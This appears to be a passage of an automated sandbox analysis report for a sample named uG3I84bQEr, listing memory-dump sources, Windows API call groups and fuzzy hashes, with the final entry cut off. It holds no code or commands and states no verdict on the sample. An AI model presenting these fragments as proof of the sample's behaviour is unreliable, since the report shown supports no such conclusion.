                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                            • Instruction ID: af81f782b9f2afb763cf5164547ef1363043bc47ca8f91e08b3a13bd089ac861
                                                            • Opcode Fuzzy Hash: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                            • Instruction Fuzzy Hash: 963135309402086EFF388B658804BBFBB66EB45310F04472FE481622D1E33D9949D75B
                                                            APIs
                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004361FB
                                                            • __isleadbyte_l.LIBCMT ref: 00436229
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00436257
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043628D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                            • String ID:
                                                            • API String ID: 3058430110-0
                                                            • Opcode ID: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                                            • Instruction ID: a268d3a3e6e94a3a382490fbdf87b59e774afa85b5b6ffc4d13239602402ad5c
                                                            • Opcode Fuzzy Hash: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                                                            • Instruction Fuzzy Hash: 8831E230600246BFDF219F65CC48B6B7BB9BF4A310F17906AE82487291DB34D850D754
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 00484F02
                                                              • Part of subcall function 00463641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046365B
                                                              • Part of subcall function 00463641: GetCurrentThreadId.KERNEL32 ref: 00463662
                                                              • Part of subcall function 00463641: AttachThreadInput.USER32(00000000,?,00465005), ref: 00463669
                                                            • GetCaretPos.USER32(?), ref: 00484F13
                                                            • ClientToScreen.USER32(00000000,?), ref: 00484F4E
                                                            • GetForegroundWindow.USER32 ref: 00484F54
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                            • String ID:
                                                            • API String ID: 2759813231-0
                                                            • Opcode ID: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                                                            • Instruction ID: 1d2def75fb9c8d520c96e6582531674793c8a8545b0fc50cd96dbe06c6996e1e
                                                            • Opcode Fuzzy Hash: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                                                            • Instruction Fuzzy Hash: 38314FB2D00108AFCB00EFA6C8819EFB7F9EF84304F00446EE515E7242EA759E058BA5
                                                            APIs
                                                              • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                            • GetCursorPos.USER32(?), ref: 0048C4D2
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043B9AB,?,?,?,?,?), ref: 0048C4E7
                                                            • GetCursorPos.USER32(?), ref: 0048C534
                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043B9AB,?,?,?), ref: 0048C56E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                            • String ID:
                                                            • API String ID: 2864067406-0
                                                            • Opcode ID: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                                            • Instruction ID: 2973952025af683afbaf652597196eb0b77ee17814688135882e4792ee887bd6
                                                            • Opcode Fuzzy Hash: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                                            • Instruction Fuzzy Hash: CE319335500028FFCF159F58C898EAF7BB5EB09310F44486AF9059B361C735AD50DBA8
                                                            APIs
                                                              • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                                                              • Part of subcall function 0045810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                                              • Part of subcall function 0045810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                                              • Part of subcall function 0045810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                                              • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004586A3
                                                            • _memcmp.LIBCMT ref: 004586C6
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004586FC
                                                            • HeapFree.KERNEL32(00000000), ref: 00458703
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                            • String ID:
                                                            • API String ID: 1592001646-0
                                                            • Opcode ID: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                                            • Instruction ID: 730e04a0c9a28b219d77ec22e6a84493cb1498a8cd35620125a6bebab32f77ad
                                                            • Opcode Fuzzy Hash: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                                            • Instruction Fuzzy Hash: E4215A71E01109EBDB10DFA4C989BAEB7B8EF45306F15405EE844AB242DB34AE09CB58
                                                            APIs
                                                            • __setmode.LIBCMT ref: 004209AE
                                                              • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                                              • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                                            • _fprintf.LIBCMT ref: 004209E5
                                                            • OutputDebugStringW.KERNEL32(?), ref: 00455DBB
                                                              • Part of subcall function 00424AAA: _flsall.LIBCMT ref: 00424AC3
                                                            • __setmode.LIBCMT ref: 00420A1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                            • String ID:
                                                            • API String ID: 521402451-0
                                                            • Opcode ID: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                                            • Instruction ID: 506474fa098cb1490a8c63a0929ef03edd2b6c88ff5c0dc42923ee6bdce5b67a
                                                            • Opcode Fuzzy Hash: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                                            • Instruction Fuzzy Hash: E31126727041146FDB04B2A5BC469BE77A8DF81318FA0416FF105632C3EE3C5946879D
                                                            APIs
                                                            • _free.LIBCMT ref: 00435101
                                                              • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                                              • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                                              • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00D40000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                                                            • Instruction ID: 565aca9384bc55ec46628ce6f4316e74187f5c3bb682111b66b5609c454c8c26
                                                            • Opcode Fuzzy Hash: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                                                            • Instruction Fuzzy Hash: D411E072E01A21AECF313FB1BC05B5E3B989B183A5F50593FF9049A250DE3C89418B9C
                                                            APIs
                                                            • _memset.LIBCMT ref: 004044CF
                                                              • Part of subcall function 0040407C: _memset.LIBCMT ref: 004040FC
                                                              • Part of subcall function 0040407C: _wcscpy.LIBCMT ref: 00404150
                                                              • Part of subcall function 0040407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                                            • KillTimer.USER32(?,00000001,?,?), ref: 00404524
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00404533
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0043D4B9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                            • String ID:
                                                            • API String ID: 1378193009-0
                                                            • Opcode ID: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                                            • Instruction ID: dcb2c65cf3c1a774e1d203f737fabc32089307ed9affa8f53aec521d9447171b
                                                            • Opcode Fuzzy Hash: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                                            • Instruction Fuzzy Hash: 6F21FBB0904754AFE7328B249C45BEBBBEC9B55318F0404AFE79A56281C3782984CB49
                                                            APIs
                                                              • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                                              • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                                            • gethostbyname.WSOCK32(?), ref: 00476399
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004763A4
                                                            • _memmove.LIBCMT ref: 004763D1
                                                            • inet_ntoa.WSOCK32(?), ref: 004763DC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                            • String ID:
                                                            • API String ID: 1504782959-0
                                                            • Opcode ID: ebe779451b8fe17377772976d37213f5a324d7049d93d61360c19b924476f115
                                                            • Instruction ID: c304d0e6e06ed5b692ae79d4b0fe9c52f6c8e6d6f1456e813eafe14ad56adccd
                                                            • Opcode Fuzzy Hash: ebe779451b8fe17377772976d37213f5a324d7049d93d61360c19b924476f115
                                                            • Instruction Fuzzy Hash: F2114F71600109AFCB00FBA5D946CEE77B9EF04314B54847AF505B72A2DB389E14CB69
                                                            APIs
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00458B61
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B73
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B89
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458BA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                            • Instruction ID: 6d6e4feeaee75d02a1ec4dd614e497ad2765f264ac6e3ed00c825e9843e5ba14
                                                            • Opcode Fuzzy Hash: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                            • Instruction Fuzzy Hash: 56113A79900218BFDB10DB95C884EAEBB78EB48710F2041A6E900B7250DA716E15DB94
                                                            APIs
                                                              • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                            • DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                            • GetClientRect.USER32(?,?), ref: 0043B5FB
                                                            • GetCursorPos.USER32(?), ref: 0043B605
                                                            • ScreenToClient.USER32(?,?), ref: 0043B610
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                            • String ID:
                                                            • API String ID: 4127811313-0
                                                            • Opcode ID: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                                            • Instruction ID: ee9d34d9398b5f91fab5137b757b2ab9dbcc007e8162b1c14587a54292e2d527
                                                            • Opcode Fuzzy Hash: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                                            • Instruction Fuzzy Hash: 39112B39510059FBCB00EF99D8899AE77B8FB05300F4008AAF901F7291D734BA569BA9
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00B915D8,00000000,00000000,?,00B92132,00B915D8,00000000,00000000,00000000,?,00B92283,00000006,FlsSetValue), ref: 00B921BD
                                                            • GetLastError.KERNEL32(?,00B92132,00B915D8,00000000,00000000,00000000,?,00B92283,00000006,FlsSetValue,00BA6FC4,FlsSetValue,00000000,00000364,?,00B9192D), ref: 00B921C9
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B92132,00B915D8,00000000,00000000,00000000,?,00B92283,00000006,FlsSetValue,00BA6FC4,FlsSetValue,00000000), ref: 00B921D7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            • Opcode ID: f50742b428ed32995369b6096df418ae14faa92b08083662a1cacede5ac8bf81
                                                            • Instruction ID: aaf66739b2785fec1a21c0c370482c7d269f03d638d8156ecda90ea3ab95cd4d
                                                            • Opcode Fuzzy Hash: f50742b428ed32995369b6096df418ae14faa92b08083662a1cacede5ac8bf81
                                                            • Instruction Fuzzy Hash: 9C018472A41232BBCB214B68EC45A667BD8EF47BA1B214670EA16F7150DB20DD11C6F0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                            • String ID:
                                                            • API String ID: 3016257755-0
                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction ID: 3d94be51af7e819a6a5def82be0e086b27bd99855e7e965629bee2c507946819
                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction Fuzzy Hash: 78014EB244414ABBCF2A5E84CC41CEE3F72BB1C354F599416FA9858131D23AD9B1AB85
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 0048B2E4
                                                            • ScreenToClient.USER32(?,?), ref: 0048B2FC
                                                            • ScreenToClient.USER32(?,?), ref: 0048B320
                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048B33B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                            • String ID:
                                                            • API String ID: 357397906-0
                                                            • Opcode ID: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                            • Instruction ID: e0f35f64d62337ec24ef524e52db7040af9c6cc02db1932b8591958b9ea84988
                                                            • Opcode Fuzzy Hash: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                            • Instruction Fuzzy Hash: B9117775D00209EFDB01DF99C444AEEBBF5FF18310F104566E914E3220D735AA558F94
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 00466BE6
                                                              • Part of subcall function 004676C4: _memset.LIBCMT ref: 004676F9
                                                            • _memmove.LIBCMT ref: 00466C09
                                                            • _memset.LIBCMT ref: 00466C16
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00466C26
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                            • String ID:
                                                            • API String ID: 48991266-0
                                                            • Opcode ID: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
